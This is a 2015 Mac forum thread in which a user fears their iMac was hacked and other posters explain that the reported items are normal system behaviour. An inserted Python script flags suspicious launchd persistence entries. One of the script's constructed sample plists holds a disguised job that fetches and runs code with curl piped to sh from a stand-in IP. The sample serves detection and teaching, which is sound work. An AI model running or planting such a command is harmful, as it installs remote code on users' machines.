HELP Hacked??

Discussion in 'iMac' started by imacdave1, Feb 1, 2015.

Thread Status:
Not open for further replies.
  1. imacdave1, Feb 1, 2015
    Last edited: Feb 1, 2015

    imacdave1 macrumors newbie

    Joined:
    Feb 1, 2015
    #1
    iMac 2013 27"

    Someone severely hacked into my iMac; they had accessed every email account I used on my iMac, including my FB account and my iCloud account. I deactivated my FB account 4 times only to see it reactivated by someone else. It got so bad that I took my iMac to an Apple-approved service repair center and had them install a new hard drive, but the idiot technician transferred the data from the compromised HD to the new HD.

    According to the modem/router log I configured on the modem, my system is being used to send out "TCP- or UDP-based Port Scan" or "SYN Flood" packets. How do I stop this? I have the firewall on the modem/router set to high and I've got the firewall on my iMac set up so it doesn't accept any incoming connections to programs that could be used by a hacker, but the TCP- or UDP-based Port Scan or SYN Flood still exists.

    I check my system resources and it looks normal, but when I run an IP scanner on my system I can see that my system is being accessed by telnet and/or OpenSSH, yet I've never configured my system for such use.

    In my com.apple.applefileserver plist file I'm supposedly using LKDC:SHA1.5488DD95F4D70CC7EE141AF1C9CC1EFBECC28819@LKDC:SHA1.5488DD95F4D70CC7EE141AF1C9CC1EFBECC28819 (Kerberos) as a server and have a hidden LDAPv3 configuration running that I knew nothing about till last night. I've disabled the Wi-Fi in System Preferences, so now I only connect to the internet via Ethernet.

    I have deleted and reformatted every partition on my hard drive, and yet the problem still exists.

    Any suggestions would be greatly appreciated.
     
  2. chrfr macrumors 603

    Joined:
    Jul 11, 2009
    #3
    This is 100% normal. It's what OS X uses internally to manage user accounts and other aspects of the system.
     
  3. Ledgem macrumors 65816

    Ledgem

    Joined:
    Jan 18, 2008
    Location:
    Hawaii, USA
    #4
    Are you reusing passwords between accounts? How strong are your passwords? Unless you're installing pirated software or visiting sketchy websites it's more likely that someone has stolen your login credentials than that your computer has been hacked. Did you try changing your passwords?
     
  4. imacdave1 thread starter macrumors newbie

    Joined:
    Feb 1, 2015
    #5
    Somewhat; the only difference is my router is showing my IP as the source and someone else as the target.

    I use a port scanning program called fing (downloaded from the Apple store) on my iPhone and iPad, and it shows that someone has been using port 62078 to back up my iPhone. The link is http://code.google.com/p/iphone-elite/source/browse/wiki/62708.wiki. I'll use the sudo command on my iMac to shut that port down. The port is associated with a program on my computer called lockdownd, but I can't seem to locate it so I can either delete it or put it in my firewall and disable it from receiving any incoming messages.

    I've changed my passwords literally hundreds of times, but now they're more complex, using symbols, numbers and letters. Because of all the problems this has caused and the money I've spent to put this crap to a stop, I'm very careful about the web sites I go to and only download from the Apple store.
     
  5. Natzoo macrumors 65816

    Natzoo

    Joined:
    Sep 16, 2014
    Location:
    Not sure where i am
    #6
    I feel like you should go to the police, and maybe get in touch with some nice investigation agency.
     
  6. imacdave1 thread starter macrumors newbie

    Joined:
    Feb 1, 2015
    #7
    Been there done that.

    The police won't get involved till there's been money taken, and even then they drag their feet. Because they had taken complete control of my iMac, the hackers could hear me and see everything that I was doing while I was in front of the computer's camera.

    Calling Apple is pointless; they'll only tell you to wipe your hard drive and start out fresh. What they fail to realize is there's an EFI partition (FAT32) that contains the computer's OS that doesn't get deleted even though you've formatted the hard drive. I had to get creative and figure out how to delete that partition, to no avail.

    The way I see it is third party software in the form of a firewall and a malware scanner that works. I could definitely use more suggestions.
     
  7. GGJstudios macrumors Westmere

    GGJstudios

    Joined:
    May 16, 2008
    #8
    Your Mac was not hacked. In over 7 years of reading "My Mac was hacked!" claims in this forum and elsewhere, not a single one ever was hacked. You can safely put that possibility out of your mind and move on to basic troubleshooting.

    Email and Facebook accounts can be compromised even if you don't own a computer. Change all of your online passwords again, including all email accounts. Make sure the new passwords are long and complex, so they're more difficult to guess.

    Launch Activity Monitor and make note of all processes running. You can post a screen capture here or simply report any processes you don't recognize.

    You can check the following locations for apps that automatically launch on startup and delete any you don't need/want:
    • System Preferences > Users & Groups > yourusername > Login Items (SL and older: System Preferences > Accounts > yourusername > Login Items)
    • In Finder, click Go > Go to Folder > /Library/LaunchAgents
    • In Finder, click Go > Go to Folder > ~/Library/LaunchAgents
    • In Finder, click Go > Go to Folder > /Library/StartupItems
    After you delete items from the list, restart your Mac and those processes should not be running.

    If you think you may have installed a Trojan, install ClamXAV and run a complete system scan. Your router's firewall and the firewall included with OS X should be sufficient. You don't need to install a 3rd party firewall.
     
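Added example, not part of the thread or of any poster's own instructions: a Python script that does the LaunchAgent check from the post above programmatically. It parses launchd plists with the standard-library plistlib, works out what each job will actually execute, and flags the patterns worth a second look: a program living in a temp or user-writable directory, a "program" that is really a shell or script interpreter with the payload hidden in its arguments, and a com.apple.* label whose program lives outside the system directories. The two plists embedded in the block are constructed samples; the label names, paths and heuristics are this example's own choices, and the directory list is the post's locations plus /Library/LaunchDaemons.

```python
"""Triage launchd plists for suspicious persistence entries.

Added example, not from the thread. Standard library only. The two plists at
the bottom are CONSTRUCTED samples; labels, paths and heuristics are this
example's own, not Apple's.
"""
import glob
import os
import plistlib

# Where launchd looks for per-user and system-wide jobs (the post's locations
# plus LaunchDaemons). Directories that do not exist are simply skipped.
LAUNCHD_DIRS = [
    "/Library/LaunchAgents",
    os.path.expanduser("~/Library/LaunchAgents"),
    "/Library/LaunchDaemons",
]
# A program stored here can be replaced by any local user or process.
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
# When the "program" is one of these, the real payload is in ProgramArguments.
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "osascript", "curl"}
# Where Apple's own com.apple.* jobs normally point (heuristic, not a spec).
SYSTEM_PREFIXES = ("/System/", "/usr/", "/Library/Apple/")

def program_of(job):
    """Return the executable launchd will run for a parsed plist dict ("" if none)."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else ""

def assess(job):
    """Return reasons the job deserves a look; an empty list means nothing stood out."""
    reasons = []
    prog = program_of(job)
    label = job.get("Label", "")
    if not prog:
        return ["no Program/ProgramArguments (malformed or deliberately odd)"]
    home = os.path.expanduser("~")
    if prog.startswith(WRITABLE_PREFIXES) or (len(home) > 1 and prog.startswith(home + "/")):
        reasons.append(f"program in a user-writable location: {prog}")
    if os.path.basename(prog) in INTERPRETERS:
        payload = " ".join(job.get("ProgramArguments", [])[1:])
        reasons.append(f"program is an interpreter ({prog}); payload is in the arguments: {payload}")
    if label.startswith("com.apple.") and not prog.startswith(SYSTEM_PREFIXES):
        reasons.append(f"Apple-looking label {label} but program outside system paths: {prog}")
    return reasons

def triage_plist_bytes(data):
    """Parse one plist (XML or binary bytes) and return (label, program, reasons)."""
    job = plistlib.loads(data)
    return job.get("Label", "<no label>"), program_of(job), assess(job)

def triage_directories(dirs=LAUNCHD_DIRS):
    """Walk the launchd directories that exist; return [(path, program, reasons)]
    for every job that was flagged or could not be parsed."""
    flagged = []
    for d in dirs:
        for path in sorted(glob.glob(os.path.join(d, "*.plist"))):
            try:
                with open(path, "rb") as fh:
                    _label, prog, reasons = triage_plist_bytes(fh.read())
            except Exception as exc:  # unreadable, corrupt, or not a dict
                flagged.append((path, "", [f"could not parse: {exc}"]))
                continue
            if reasons:
                flagged.append((path, prog, reasons))
    return flagged

# CONSTRUCTED samples: an ordinary third-party updater and a masquerading job.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/ExampleApp.app/Contents/MacOS/updater</string>
    <string>--check</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

SHADY_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>curl -s http://192.0.2.10/p | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for name, data in (("benign sample", BENIGN_PLIST), ("shady sample", SHADY_PLIST)):
        label, prog, reasons = triage_plist_bytes(data)
        print(f"{name}: label={label} program={prog} -> {reasons or 'nothing stood out'}")
    for path, prog, reasons in triage_directories():  # real directories, if on a Mac
        print(path, prog, reasons)
```

Run on a Mac it also walks the real directories; anywhere else only the embedded samples are assessed. A flagged entry is a lead, not a verdict: plenty of legitimate updaters run through a bash wrapper or use RunAtLoad, so read the plist before deleting it. Activity Monitor only shows what is running right now; these plists are what will run again after the restart the post recommends.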
  8. Ledgem macrumors 65816

    Ledgem

    Joined:
    Jan 18, 2008
    Location:
    Hawaii, USA
    #9
    Unless you're thinking that someone malicious had physical access to your computer, it's very unlikely that the EFI or recovery partition has been tampered with.
     
  9. Chippy99 macrumors 6502a

    Joined:
    Apr 28, 2012
    #10
    And even then, unlikely. Unless you live in Russia and have been saying bad things about Putin, I think you can rule that out.
     
  10. imacdave1 thread starter macrumors newbie

    Joined:
    Feb 1, 2015
    #11
    Thanks for replying. I checked all the folders that have been suggested and they all looked OK. I came across a file concerning a hidden LDAPv3 connection that I knew nothing about; it reads as follows: it has a hidden registration, locked, AppleODC client, it uses DNS replicas and an "altServer replica". I wasn't aware of an alternate server being installed on my hard drive; that being said, is this a legitimate file?

    When I go to System Preferences > Users & Groups > Login Items > Network Account Server > Join > Open Directory Utility and click on LDAPv3, the only option I have is to make a new account.
     
  11. chrfr macrumors 603

    Joined:
    Jul 11, 2009
    #12
    Yes, this is all totally normal. As I said, it's how OS X manages user accounts, even if there's only one user account on the computer.
     
  12. imacdave1 thread starter macrumors newbie

    Joined:
    Feb 1, 2015
    #13
    Maybe you're right and I'm just gun-shy right now. I'm still trying to understand how the port scanner detected my iPhone using port 62078 and was backed up. I just googled "port 62078 hack"; here's what I came up with:

    https://www.google.com/search?q=port+62078+exploit&ie=utf-8&oe=utf-8
     
  13. chrfr macrumors 603

    Joined:
    Jul 11, 2009
    #14
    Your searches are making you unnecessarily paranoid. Port 62078 is how the phone connects to iTunes for wifi sync. While it may be possible to exploit that port, again, you're not seeing any evidence at all that this is actually happening.
    I assume that you have secured your wifi network at home with a WPA2 password. If not, you should do that right away, even if your computer is connected to that network over ethernet.
    Every month or two a new poster comes on the forum stating that their Mac has been "hacked." There has never been actual evidence that this is the case. It's all but certain that your email/Facebook/whatever accounts were compromised by a bad password or passwords somewhere rather than a hack on your specific Mac.
    Where you should be focusing your attention is on your accounts themselves. Implement 2-factor authentication where possible, and where it's not possible, be sure you're using strong and unique passwords for each account.
     